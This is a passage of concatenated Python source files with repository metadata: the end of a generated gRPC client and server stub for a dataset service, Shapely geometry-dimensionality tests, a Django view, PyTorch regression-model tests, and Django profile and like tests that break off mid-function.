servicer.UpdateDataset,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UpdateDatasetRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UpdateDatasetResponse.SerializeToString,
),
'DeleteDataset': grpc.unary_unary_rpc_method_handler(
servicer.DeleteDataset,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DeleteDatasetRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DeleteDatasetResponse.SerializeToString,
),
'CompareDatasets': grpc.unary_unary_rpc_method_handler(
servicer.CompareDatasets,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CompareDatasetsRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CompareDatasetsResponse.SerializeToString,
),
'GetDatasetProfile': grpc.unary_unary_rpc_method_handler(
servicer.GetDatasetProfile,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetProfileRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetProfileResponse.SerializeToString,
),
'CreateDatasetProfile': grpc.unary_unary_rpc_method_handler(
servicer.CreateDatasetProfile,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetProfileRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetProfileResponse.SerializeToString,
),
'CreateColumnProfile': grpc.unary_unary_rpc_method_handler(
servicer.CreateColumnProfile,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateColumnProfileRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateColumnProfileResponse.SerializeToString,
),
'GenerateDataset': grpc.unary_unary_rpc_method_handler(
servicer.GenerateDataset,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GenerateDatasetRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GenerateDatasetResponse.SerializeToString,
),
'ValidateDataset': grpc.unary_unary_rpc_method_handler(
servicer.ValidateDataset,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ValidateDatasetRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ValidateDatasetResponse.SerializeToString,
),
'UploadChunk': grpc.unary_unary_rpc_method_handler(
servicer.UploadChunk,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UploadChunkRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UploadChunkResponse.SerializeToString,
),
'DownloadDataset': grpc.unary_unary_rpc_method_handler(
servicer.DownloadDataset,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DownloadDatasetRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DownloadDatasetResponse.SerializeToString,
),
'GetDatabases': grpc.unary_unary_rpc_method_handler(
servicer.GetDatabases,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatabasesRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatabasesResponse.SerializeToString,
),
'GetTables': grpc.unary_unary_rpc_method_handler(
servicer.GetTables,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetTablesRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetTablesResponse.SerializeToString,
),
'ExecuteSql': grpc.unary_unary_rpc_method_handler(
servicer.ExecuteSql,
request_deserializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ExecuteSqlRequest.FromString,
response_serializer=github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ExecuteSqlResponse.SerializeToString,
),
}
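# Descriptive note (added): the generic handler below routes each incoming
# call on the fully-qualified service name to its entry in rpc_method_handlers.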
generic_handler = grpc.method_handlers_generic_handler(
'github.com.metaprov.modelaapi.services.dataset.v1.DatasetService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class DatasetService(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def ListDatasets(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/ListDatasets',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ListDatasetsRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ListDatasetsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetDataset(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GetDataset',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateDataset(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/CreateDataset',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateDataset(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/UpdateDataset',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UpdateDatasetRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UpdateDatasetResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteDataset(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/DeleteDataset',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DeleteDatasetRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DeleteDatasetResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CompareDatasets(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/CompareDatasets',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CompareDatasetsRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CompareDatasetsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetDatasetProfile(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GetDatasetProfile',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetProfileRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatasetProfileResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateDatasetProfile(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/CreateDatasetProfile',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetProfileRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateDatasetProfileResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateColumnProfile(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/CreateColumnProfile',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateColumnProfileRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.CreateColumnProfileResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GenerateDataset(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GenerateDataset',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GenerateDatasetRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GenerateDatasetResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ValidateDataset(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/ValidateDataset',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ValidateDatasetRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ValidateDatasetResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UploadChunk(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/UploadChunk',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UploadChunkRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.UploadChunkResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DownloadDataset(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/DownloadDataset',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DownloadDatasetRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DownloadDatasetResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetDatabases(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GetDatabases',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatabasesRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatabasesResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetTables(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GetTables',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetTablesRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetTablesResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ExecuteSql(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/ExecuteSql',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ExecuteSqlRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ExecuteSqlResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
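# Usage sketch (not part of the generated output): it assumes a DatasetService
# server is listening on localhost:3000; that address and the default-valued
# request below are illustrative assumptions. The static methods above wrap
# grpc.experimental.unary_unary, which opens or reuses a channel per call, so
# this style suits scripts rather than long-lived clients.
if __name__ == '__main__':
    _pb2 = github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2
    _response = DatasetService.ListDatasets(
        _pb2.ListDatasetsRequest(),  # empty request; real calls set its fields
        'localhost:3000',            # assumed target address
        insecure=True,               # plaintext channel, local testing only
        timeout=5.0)
    print(_response)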
(numeric per-file metric columns omitted)
90ad40c21bdc1c3036ceb16c8453d894f88af372 | 7,473 | py | Python | tests/test_create_inconsistent_dimensionality.py | chadwhawkins/Shapely | 73626bce8e99b3f251ad874a41d97d2384e734ce | ["BSD-3-Clause"] | 1 | 2020-08-24T14:38:08.000Z | 2020-08-24T14:38:08.000Z | tests/test_create_inconsistent_dimensionality.py | chadwhawkins/Shapely | 73626bce8e99b3f251ad874a41d97d2384e734ce | ["BSD-3-Clause"] | null | null | null | tests/test_create_inconsistent_dimensionality.py | chadwhawkins/Shapely | 73626bce8e99b3f251ad874a41d97d2384e734ce | ["BSD-3-Clause"] | null | null | null |
"""
When a "context" passed to shape/asShape has a coordinate
which is missing a dimension we should raise a descriptive error.
When we use mixed dimensions in a WKT geometry, the parser strips
any dimension which is not present in every coordinate.
"""
import pytest
from shapely import wkt
from shapely.geometry import shape, LineString, Polygon
geojson_cases = [
{"type": "LineString", "coordinates": [[1, 1, 1], [2, 2]]},
# Specific test case from #869
{"type": "Polygon", "coordinates": [[[55.12916764533149, 24.980385694214384, 2.5], [55.13098248044217, 24.979828079961905], [55.13966519231666, 24.97801442415322], [55.13966563924936, 24.97801442415322], [55.14139286840762, 24.982307444496097], [55.14169331277646, 24.983717465495562], [55.14203489144224, 24.985419446276566, 2.5], [55.14180327151276, 24.98428602667792, 2.5], [55.14170091915952, 24.984242720177235, 2.5], [55.14122966992623, 24.984954809433702, 2.5], [55.14134021791831, 24.985473928648396, 2.5], [55.141405876161286, 24.986090184809793, 2.5], [55.141361358941225, 24.986138101357326, 2.5], [55.14093322994411, 24.986218753894093, 2.5], [55.140897653420964, 24.986214283545635, 2.5], [55.14095492976058, 24.9863027591922, 2.5], [55.140900447388745, 24.98628436557094, 2.5], [55.140867059473706, 24.98628869622101, 2.5], [55.14089155325796, 24.986402364143782, 2.5], [55.14090938808566, 24.986479011993385, 2.5], [55.140943893587824, 24.986471188883584, 2.5], [55.1410161176551, 24.9864174050037, 2.5], [55.140996932409635, 24.986521806266644, 2.5], [55.14163554031332, 24.986910400619593, 2.5], [55.14095781686062, 24.987033474900578, 2.5], [55.14058258698692, 24.98693261266349, 2.5], [55.14032624044253, 24.98747538747211, 2.5], [55.14007240846915, 24.988001119077232, 2.5], [55.14013122149105, 24.98831115636925, 2.5], [55.13991827457961, 24.98834356639557, 2.5], [55.139779460946755, 24.988254625087706, 2.5], [55.13974742344948, 24.988261377176524, 2.5], [55.139515198160304, 24.98841811876934, 2.5], [55.13903617238334, 24.98817914139135, 2.5], [55.1391330764994, 24.988660542040925, 2.5], [55.13914369357698, 24.989438289540374, 2.5], [55.136431216517785, 24.98966711550207, 2.0], [55.13659028641709, 24.99041706302204, 2.0], [55.1355852030721, 24.990933481401207, 2.5], [55.13535549235394, 24.99110470506038, 2.5], [55.13512578163577, 24.99127592871955, 2.5], [55.129969653784556, 24.991440074326995, 2.5], [55.130221623112746, 24.988070688875112, 2.5], [55.130451333830905, 24.98789946521594, 2.5], [55.13089208224919, 24.98742639990359, 2.5], [55.132177586827666, 24.989003408454433, 2.5], [55.13238862452779, 24.988701566801254, 2.5], [55.132482594977674, 24.988501518707757, 2.5], [55.132525994610624, 24.988048802794115, 2.5], [55.13249018525683, 24.987180623870653, 2.5], [55.13253358488978, 24.986727907957015, 2.5], [55.1322761673244, 24.985827132742713, 2.5], [55.13163341503516, 24.98503862846729, 2.5], [55.131514764536504, 24.984469124700183, 2.5], [55.131275600894, 24.983796337257242, 2.0], [55.13066865795855, 24.98387601190528, 2.0], [55.13026930682963, 24.981537228037503, 2.0], [55.130260412698846, 24.981495691049748, 2.0], [55.13025151856806, 24.981454154061993, 2.0], [55.13022925995803, 24.98096497686874, 2.5], [55.12984453059386, 24.9804285816199, 2.5], [55.129998291954365, 24.98021419115843, 2.5], [55.12916764533149, 24.980385694214384, 2.5]]]},
]
direct_cases = [
(LineString, [[[0, 0, 0], [1, 1]]]),
(Polygon, [[[0, 0, 0], [1, 1, 0], [1, 1], [0, 1, 0], [0, 0, 0]]]),
# Specific test case from #869
(Polygon, [[[55.12916764533149, 24.980385694214384, 2.5], [55.13098248044217, 24.979828079961905], [55.13966519231666, 24.97801442415322], [55.13966563924936, 24.97801442415322], [55.14139286840762, 24.982307444496097], [55.14169331277646, 24.983717465495562], [55.14203489144224, 24.985419446276566, 2.5], [55.14180327151276, 24.98428602667792, 2.5], [55.14170091915952, 24.984242720177235, 2.5], [55.14122966992623, 24.984954809433702, 2.5], [55.14134021791831, 24.985473928648396, 2.5], [55.141405876161286, 24.986090184809793, 2.5], [55.141361358941225, 24.986138101357326, 2.5], [55.14093322994411, 24.986218753894093, 2.5], [55.140897653420964, 24.986214283545635, 2.5], [55.14095492976058, 24.9863027591922, 2.5], [55.140900447388745, 24.98628436557094, 2.5], [55.140867059473706, 24.98628869622101, 2.5], [55.14089155325796, 24.986402364143782, 2.5], [55.14090938808566, 24.986479011993385, 2.5], [55.140943893587824, 24.986471188883584, 2.5], [55.1410161176551, 24.9864174050037, 2.5], [55.140996932409635, 24.986521806266644, 2.5], [55.14163554031332, 24.986910400619593, 2.5], [55.14095781686062, 24.987033474900578, 2.5], [55.14058258698692, 24.98693261266349, 2.5], [55.14032624044253, 24.98747538747211, 2.5], [55.14007240846915, 24.988001119077232, 2.5], [55.14013122149105, 24.98831115636925, 2.5], [55.13991827457961, 24.98834356639557, 2.5], [55.139779460946755, 24.988254625087706, 2.5], [55.13974742344948, 24.988261377176524, 2.5], [55.139515198160304, 24.98841811876934, 2.5], [55.13903617238334, 24.98817914139135, 2.5], [55.1391330764994, 24.988660542040925, 2.5], [55.13914369357698, 24.989438289540374, 2.5], [55.136431216517785, 24.98966711550207, 2.0], [55.13659028641709, 24.99041706302204, 2.0], [55.1355852030721, 24.990933481401207, 2.5], [55.13535549235394, 24.99110470506038, 2.5], [55.13512578163577, 24.99127592871955, 2.5], [55.129969653784556, 24.991440074326995, 2.5], [55.130221623112746, 24.988070688875112, 2.5], [55.130451333830905, 24.98789946521594, 2.5], [55.13089208224919, 24.98742639990359, 2.5], [55.132177586827666, 24.989003408454433, 2.5], [55.13238862452779, 24.988701566801254, 2.5], [55.132482594977674, 24.988501518707757, 2.5], [55.132525994610624, 24.988048802794115, 2.5], [55.13249018525683, 24.987180623870653, 2.5], [55.13253358488978, 24.986727907957015, 2.5], [55.1322761673244, 24.985827132742713, 2.5], [55.13163341503516, 24.98503862846729, 2.5], [55.131514764536504, 24.984469124700183, 2.5], [55.131275600894, 24.983796337257242, 2.0], [55.13066865795855, 24.98387601190528, 2.0], [55.13026930682963, 24.981537228037503, 2.0], [55.130260412698846, 24.981495691049748, 2.0], [55.13025151856806, 24.981454154061993, 2.0], [55.13022925995803, 24.98096497686874, 2.5], [55.12984453059386, 24.9804285816199, 2.5], [55.129998291954365, 24.98021419115843, 2.5], [55.12916764533149, 24.980385694214384, 2.5]]]),
]
wkt_cases = [
('LINESTRING (1 1 1, 2 2)', 'LINESTRING (1.0000000000000000 1.0000000000000000, 2.0000000000000000 2.0000000000000000)'),
('POLYGON ((0 0 0, 1 0 0, 1 1, 0 1 0, 0 0 0))', 'POLYGON ((0.0000000000000000 0.0000000000000000, 1.0000000000000000 0.0000000000000000, 1.0000000000000000 1.0000000000000000, 0.0000000000000000 1.0000000000000000, 0.0000000000000000 0.0000000000000000))')
]
@pytest.mark.parametrize('geojson', geojson_cases)
def test_create_from_geojson(geojson):
with pytest.raises(ValueError) as exc:
wkt_str = shape(geojson).wkt  # renamed so the imported wkt module is not shadowed
assert exc.match("Inconsistent coordinate dimensionality")
@pytest.mark.parametrize('constructor, args', direct_cases)
def test_create_directly(constructor, args):
with pytest.raises(ValueError) as exc:
geom = constructor(*args)
assert exc.match("Inconsistent coordinate dimensionality")
@pytest.mark.parametrize('wkt_geom,expected', wkt_cases)
def test_create_from_wkt(wkt_geom, expected):
geom = wkt.loads(wkt_geom)
assert geom.wkt == expected
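# Companion check, not from the original suite: the WKT parser's stripping
# behaviour means the parsed geometry ends up strictly 2D.
def test_wkt_parser_result_is_2d():
    geom = wkt.loads('LINESTRING (1 1 1, 2 2)')
    assert not geom.has_z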
(numeric per-file metric columns omitted)
90f3b675a66ee395237b0cbd6c262be39514aed5 | 147 | py | Python | app/main_page/views.py | JONGSKY/patent_search | 0892663d7332132da3713a846ff5a37ed2c51536 | ["MIT"] | 3 | 2020-12-14T14:06:04.000Z | 2020-12-29T02:22:28.000Z | app/main_page/views.py | JONGSKY/patent_search | 0892663d7332132da3713a846ff5a37ed2c51536 | ["MIT"] | 5 | 2020-11-25T08:47:24.000Z | 2020-12-18T09:07:17.000Z | app/main_page/views.py | JONGSKY/patent_search | 0892663d7332132da3713a846ff5a37ed2c51536 | ["MIT"] | 2 | 2020-11-24T10:09:18.000Z | 2021-04-28T15:59:15.000Z |
from django.shortcuts import render
# Create your views here.
def main_page(request):
return render(request, 'main_page/main_page.html')
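# A minimal urls.py wiring for this view (the app label and route name are
# assumptions; only main_page itself comes from this module). Kept as a
# comment since urlpatterns belong in a separate file:
#
#     from django.urls import path
#     from main_page import views
#
#     urlpatterns = [
#         path('', views.main_page, name='main_page'),
#     ]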
(numeric per-file metric columns omitted)
293961e5ab195bca63050351c25bf58627a6c75b | 1,527 | py | Python | tests/test_model.py | cbbruss/frustanet | 8b08470ba3165012b58d9424ea985895e1324c26 | ["Unlicense", "MIT"] | null | null | null | tests/test_model.py | cbbruss/frustanet | 8b08470ba3165012b58d9424ea985895e1324c26 | ["Unlicense", "MIT"] | null | null | null | tests/test_model.py | cbbruss/frustanet | 8b08470ba3165012b58d9424ea985895e1324c26 | ["Unlicense", "MIT"] | null | null | null |
# Testing Model
import torch
import numpy as np
from frustanet.model import FrustaNetRegression
# Tests with just linear model
def test_forward():
net = FrustaNetRegression(n_features=10)
x = torch.randn(2, 10)
out = net(x)
assert out[0].shape[1] == 1
def test_training_step():
net = FrustaNetRegression(n_features=10)
x = torch.randn(2, 10)
y = torch.randn(2, 1)
loss = net.training_step((x, y), 0)
assert loss > 0
def test_validation_step():
net = FrustaNetRegression(n_features=10)
x = torch.randn(2, 10)
y = torch.randn(2, 1)
loss = net.validation_step((x, y), 0)
assert loss > 0
# Tests with non-linear model
def test_forward_nonlinear():
net = FrustaNetRegression(n_features=10, n_estimators=5)
x = torch.randn(2, 10)
out = net(x)
assert out[0].shape[1] == 1
def test_training_step_nonlinear():
net = FrustaNetRegression(n_features=10, n_estimators=5)
x = torch.randn(2, 10)
y = torch.randn(2, 1)
loss = net.training_step((x, y), 0)
assert loss > 0
def test_validation_step_nonlinear():
net = FrustaNetRegression(n_features=10, n_estimators=5)
x = torch.randn(2, 10)
y = torch.randn(2, 1)
loss = net.validation_step((x, y), 0)
assert loss > 0
def test_predict():
net = FrustaNetRegression(n_features=10, n_estimators=5)
x = torch.randn(2, 10)
y = torch.randn(2, 1)
preds = net.predict(x)
mse = torch.mean((preds - y) ** 2)
assert len(preds) == 2
assert mse
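# The linear and non-linear cases above differ only in n_estimators, so the
# same coverage can be written once with parametrization. A sketch (pytest is
# assumed to be the runner; torch and FrustaNetRegression are imported above):
import pytest

@pytest.mark.parametrize('kwargs', [dict(n_features=10),
                                    dict(n_features=10, n_estimators=5)])
def test_training_step_param(kwargs):
    net = FrustaNetRegression(**kwargs)
    x = torch.randn(2, 10)
    y = torch.randn(2, 1)
    assert net.training_step((x, y), 0) > 0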
(numeric per-file metric columns omitted)
2965d4b4dab84814440b0c57c3e0be9eece50537 | 6,673 | py | Python | users/tests.py | jtkim03/Find-a-QT | a330c95f76bcc148febf39284c07d3ac4f909b4e | ["BSD-3-Clause"] | null | null | null | users/tests.py | jtkim03/Find-a-QT | a330c95f76bcc148febf39284c07d3ac4f909b4e | ["BSD-3-Clause"] | 9 | 2021-03-30T13:42:35.000Z | 2022-03-12T00:36:19.000Z | users/tests.py | jtkim03/Find-a-QT | a330c95f76bcc148febf39284c07d3ac4f909b4e | ["BSD-3-Clause"] | null | null | null |
from django.test import TestCase
from .models import Profile, Like, Dislike
from django.contrib.auth.models import User
# Create your tests here.
""" Tests if updating a Profile works correctly """
class ChangeProfileTest(TestCase):
def setUp(self):
self.test_user = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
def test_str(self):
test_user = self.test_user
test_profile = Profile.objects.get(user=test_user)
test_profile.bio = "I am a student at the University of Virginia"
test_profile.save()
self.assertEqual(test_profile.bio, "I am a student at the University of Virginia")
""" Tests the string function of the Like model """
class LikeStrTest(TestCase):
def setUp(self):
self.test_user_one = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
self.test_user_two = User.objects.create_user('JoshD', 'joshd@mail.com', 'joshpassword')
def test_str(self):
test_user_one = self.test_user_one
test_user_two = self.test_user_two
test_like, created = Like.objects.get_or_create(current_user=test_user_one)
test_like.users.add(test_user_two)
test_like_dos, created = Like.objects.get_or_create(current_user=test_user_two)
self.assertEqual(str(test_like_dos), "JoshD is liked by 1 users!")
""" Tests the give_like function of the Dislike model """
class GiveLikeTest(TestCase):
def setUp(self):
self.test_user_one = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
self.test_user_two = User.objects.create_user('JoshD', 'joshd@mail.com', 'joshpassword')
def test_str(self):
test_user_one = self.test_user_one
test_user_two = self.test_user_two
